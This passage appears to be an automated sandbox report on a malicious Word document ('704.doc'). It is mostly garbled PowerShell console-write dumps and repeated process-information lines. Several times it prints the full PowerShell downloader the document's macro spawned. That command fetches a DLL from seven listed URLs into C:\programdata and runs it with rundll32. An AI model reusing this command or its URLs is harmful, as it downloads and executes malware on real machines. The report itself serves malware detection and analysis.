Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....$......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....%................7.............}..v....0&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....,......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....-................7.............}..v....0.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(3................7.............}..v.....3......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....p:......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(;................7.............}..v.....;......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......?......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....@................7.............}..v.....A......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....PF......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....G................7.............}..v.....G......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v.....K......0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....K................7.............}..v....PL......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....H.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v....h.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k.... .................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.4.9.............}..v............0.b...............T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................l.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................m.k....h.................7.............}..v............0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.......t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .<.<.<.<. . .$.d.f.k.j.....0.b...............T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................m.k......................7.............}..v....`.......0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v....(%......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k.....%................7.............}..v....`&......0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v.....*......0.b...............T.....,.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....8+................7.............}..v.....+......0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v.....2......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....83................7.............}..v.....3......0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.b...............T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k.....8................7.............}..v....09......0.b.............h.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........l.k......T...............7.............}..v.....<......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....x=................7.............}..v.....=......0.b.............h.T.............(...............
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$704.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE407.tmpJump to behavior
Source: classification engineClassification label: mal92.expl.evad.winDOC@5/13@0/0
Source: 704.docOLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: ~DF59F33552EDE7EF7C.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
Obfuscated command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Suspicious powershell command line foundShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
